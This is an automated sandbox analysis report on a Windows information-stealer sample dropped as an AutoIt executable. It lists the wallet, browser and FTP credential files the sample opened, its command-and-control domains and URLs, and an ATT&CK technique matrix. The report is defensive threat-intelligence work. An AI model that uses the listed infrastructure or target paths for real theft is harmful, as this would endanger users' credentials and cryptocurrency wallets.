                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                  Source: Appliance.comBinary or memory string: WIN_81
                  Source: Appliance.comBinary or memory string: WIN_XP
                  Source: Appliance.com.1.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                  Source: Appliance.comBinary or memory string: WIN_XPe
                  Source: Appliance.comBinary or memory string: WIN_VISTA
                  Source: Appliance.comBinary or memory string: WIN_7
                  Source: Appliance.comBinary or memory string: WIN_8
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: Yara matchFile source: Process Memory Space: Appliance.com PID: 4504, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: Process Memory Space: Appliance.com PID: 4504, type: MEMORYSTR
                  Source: Yara matchFile source: 10.2.Appliance.com.3d0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2115074326.0000000001C8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.1994621887.0000000001CA5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2115489202.000000000437E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.1995305908.0000000004ACC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E42263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_00E42263
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E41C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,10_2_00E41C61
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure2
                  Valid Accounts
                  21
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  Exploitation for Privilege Escalation
                  1
                  Disable or Modify Tools
                  2
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  2
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Native API
                  2
                  Valid Accounts
                  1
                  DLL Side-Loading
                  11
                  Deobfuscate/Decode Files or Information
                  21
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol41
                  Data from Local System
                  11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  PowerShell
                  Logon Script (Windows)2
                  Valid Accounts
                  2
                  Obfuscated Files or Information
                  Security Account Manager13
                  File and Directory Discovery
                  SMB/Windows Admin Shares21
                  Input Capture
                  3
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                  Access Token Manipulation
                  1
                  DLL Side-Loading
                  NTDS36
                  System Information Discovery
                  Distributed Component Object Model3
                  Clipboard Data
                  114
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                  Process Injection
                  11
                  Masquerading
                  LSA Secrets141
                  Security Software Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                  Valid Accounts
                  Cached Domain Credentials11
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                  Virtualization/Sandbox Evasion
                  DCSync4
                  Process Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                  Access Token Manipulation
                  Proc Filesystem1
                  Application Window Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                  Process Injection
                  /etc/passwd and /etc/shadow1
                  System Owner/User Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  HouseholdsClicking.exe69%VirustotalBrowse
                  HouseholdsClicking.exe61%ReversingLabsWin32.Exploit.LummaC
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\19152\Appliance.com0%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://sputnik-1985.com:443/api2o4p.default-release/key4.dbPK100%Avira URL Cloudmalware
                  http://store.steamp0%Avira URL Cloudsafe
                  https://sputnik-1985.com/api/100%Avira URL Cloudmalware
                  https://community.fastl0%Avira URL Cloudsafe
                  https://community.fastlyVG70%Avira URL Cloudsafe
                  https://sputnik-1985.com/Wn3100%Avira URL Cloudmalware
                  https://sordid-snaked.cyou:443/api100%Avira URL Cloudmalware
                  https://sputnik-1985.com:443/api100%Avira URL Cloudmalware
                  https://sputnik-1985.com/Cj9F100%Avira URL Cloudmalware
                  https://sputnik-1985.com/api#bq100%Avira URL Cloudmalware
                  https://store.s0%Avira URL Cloudsafe
                  https://sputnik-1985.com/shqK100%Avira URL Cloudmalware
                  https://sputnik-1985.com/%e100%Avira URL Cloudmalware
                  https://sputnik-1985.com/)g100%Avira URL Cloudmalware
                  https://sputnik-1985.com/Y100%Avira URL Cloudmalware
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  steamcommunity.com
                  104.102.49.254
                  truefalse
                    high
                    sputnik-1985.com
                    104.21.64.1
                    truefalse
                      high
                      sordid-snaked.cyou
                      unknown
                      unknownfalse
                        high
                        diffuculttan.xyz
                        unknown
                        unknownfalse
                          high
                          effecterectz.xyz
                          unknown
                          unknownfalse
                            high
                            aGpUaEJqSGxZhd.aGpUaEJqSGxZhd
                            unknown
                            unknowntrue
                              unknown
                              awake-weaves.cyou
                              unknown
                              unknownfalse
                                high
                                immureprech.biz
                                unknown
                                unknownfalse
                                  high
                                  wrathful-jammy.cyou
                                  unknown
                                  unknownfalse
                                    high
                                    ingreem-eilish.biz
                                    unknown
                                    unknownfalse
                                      high
                                      deafeninggeh.biz
                                      unknown
                                      unknownfalse
                                        high
                                        debonairnukk.xyz
                                        unknown
                                        unknownfalse
                                          high
                                          NameMaliciousAntivirus DetectionReputation
                                          sordid-snaked.cyoufalse
                                            high
                                            deafeninggeh.bizfalse
                                              high
                                              diffuculttan.xyzfalse
                                                high
                                                effecterectz.xyzfalse
                                                  high
                                                  wrathful-jammy.cyoufalse
                                                    high
                                                    https://sputnik-1985.com/apifalse
                                                      high
                                                      https://steamcommunity.com/profiles/76561199724331900false
                                                        high
                                                        awake-weaves.cyoufalse
                                                          high
                                                          immureprech.bizfalse
                                                            high
                                                            debonairnukk.xyzfalse
                                                              high
                                                              ingreem-eilish.bizfalse
                                                                high
                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                https://community.fastlyVG7Appliance.com, 0000000A.00000002.2115264331.0000000004315000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://duckduckgo.com/chrome_newtabAppliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://store.steampAppliance.com, 0000000A.00000002.2115264331.0000000004315000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://duckduckgo.com/ac/?q=Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://sordid-snaked.cyou:443/apiAppliance.com, 0000000A.00000002.2113990357.0000000001A6C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Appliance.com, 0000000A.00000003.2036642508.000000000434C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036958344.000000000434C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Appliance.com, 0000000A.00000003.2036831338.0000000001D14000.00000004.00000020.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036753349.0000000004435000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.autoitscript.com/autoit3/Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Leslie.0.dr, Appliance.com.1.drfalse
                                                                          high
                                                                          https://sputnik-1985.com/api#bqAppliance.com, 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          https://sputnik-1985.com/api/Appliance.com, 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          http://x1.c.lencr.org/0Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://x1.i.lencr.org/0Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://sputnik-1985.com/Wn3Appliance.com, 0000000A.00000003.2060885698.000000000433C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2059066232.0000000004337000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2059317264.000000000433C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallAppliance.com, 0000000A.00000003.2036831338.0000000001CEF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchAppliance.com, 0000000A.00000003.2036642508.000000000434C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036958344.000000000434C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://sputnik-1985.com:443/apiAppliance.com, 0000000A.00000002.2113990357.0000000001A6C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  https://sputnik-1985.com:443/api2o4p.default-release/key4.dbPKAppliance.com, 0000000A.00000002.2113990357.0000000001A6C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  https://support.mozilla.org/products/firefoxgro.allAppliance.com, 0000000A.00000003.2060048594.00000000060E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://sputnik-1985.com/Cj9FAppliance.com, 0000000A.00000002.2115530559.00000000043F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    https://community.fastlAppliance.com, 0000000A.00000002.2115264331.0000000004315000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://store.sAppliance.com, 0000000A.00000002.2115264331.0000000004315000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoAppliance.com, 0000000A.00000003.2036642508.000000000434C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036958344.000000000434C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://notepad-plus-plus.org/0HouseholdsClicking.exefalse
                                                                                        high
                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://sputnik-1985.com/shqKAppliance.com, 0000000A.00000002.2115530559.00000000043F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          unknown
                                                                                          http://crl.rootca1.amazontrust.com/rootca1.crl0Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.autoitscript.com/autoit3/XAppliance.com, 0000000A.00000000.1780609584.0000000000E95000.00000002.00000001.01000000.00000007.sdmp, Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Replacing.0.dr, Appliance.com.1.drfalse
                                                                                              high
                                                                                              http://ocsp.rootca1.amazontrust.com0:Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Appliance.com, 0000000A.00000003.2036831338.0000000001D14000.00000004.00000020.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036753349.0000000004435000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://nsis.sf.net/NSIS_ErrorErrorHouseholdsClicking.exefalse
                                                                                                    high
                                                                                                    https://www.ecosia.org/newtab/Appliance.com, 0000000A.00000003.2036642508.000000000434C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036958344.000000000434C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brAppliance.com, 0000000A.00000003.2060048594.00000000060E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://effecterectz.xyz/apiAppliance.com, 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://sputnik-1985.com/Appliance.com, 0000000A.00000003.2060885698.000000000433C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000002.2114472331.0000000001A94000.00000004.00000020.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2059066232.0000000004337000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000002.2115264331.00000000042FA000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2059317264.000000000433C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://ac.ecosia.org/autocomplete?q=Appliance.com, 0000000A.00000003.2036642508.000000000434C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036958344.000000000434C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://support.microsofAppliance.com, 0000000A.00000003.2036753349.0000000004437000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://sputnik-1985.com/%eAppliance.com, 0000000A.00000002.2115264331.00000000042FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                unknown
                                                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://sputnik-1985.com/)gAppliance.com, 0000000A.00000002.2115264331.0000000004335000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: malware
                                                                                                                  unknown
                                                                                                                  https://sputnik-1985.com/YAppliance.com, 0000000A.00000002.2115530559.00000000043F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: malware
                                                                                                                  unknown
                                                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesAppliance.com, 0000000A.00000003.2036831338.0000000001CEF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Appliance.com, 0000000A.00000003.2036642508.000000000434C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036958344.000000000434C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs
                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      104.102.49.254
                                                                                                                      steamcommunity.comUnited States
                                                                                                                      16625AKAMAI-ASUSfalse
                                                                                                                      104.21.64.1
                                                                                                                      sputnik-1985.comUnited States
                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                                                      Analysis ID:1587455
                                                                                                                      Start date and time:2025-01-10 12:04:57 +01:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 6m 19s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                      Number of analysed new started processes analysed:16
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:0
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Sample name:HouseholdsClicking.exe
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@22/21@12/2
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 100%
                                                                                                                      HCA Information:
                                                                                                                      • Successful, ratio: 98%
                                                                                                                      • Number of executed functions: 72
                                                                                                                      • Number of non-executed functions: 310
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                      • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
                                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                      TimeTypeDescription
                                                                                                                      06:05:54API Interceptor1x Sleep call for process: HouseholdsClicking.exe modified
                                                                                                                      06:06:21API Interceptor10x Sleep call for process: Appliance.com modified
                                                                                                                      11:05:44Task SchedulerRun new task: {AD1E9D9F-126C-4E70-8AF2-E5B4693A998C} path: .
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                      • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                      http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                      • www.valvesoftware.com/legal.htm
                                                                                                                      104.21.64.11162-201.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.mzkd6gp5.top/utww/
                                                                                                                      QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.mzkd6gp5.top/3u0p/
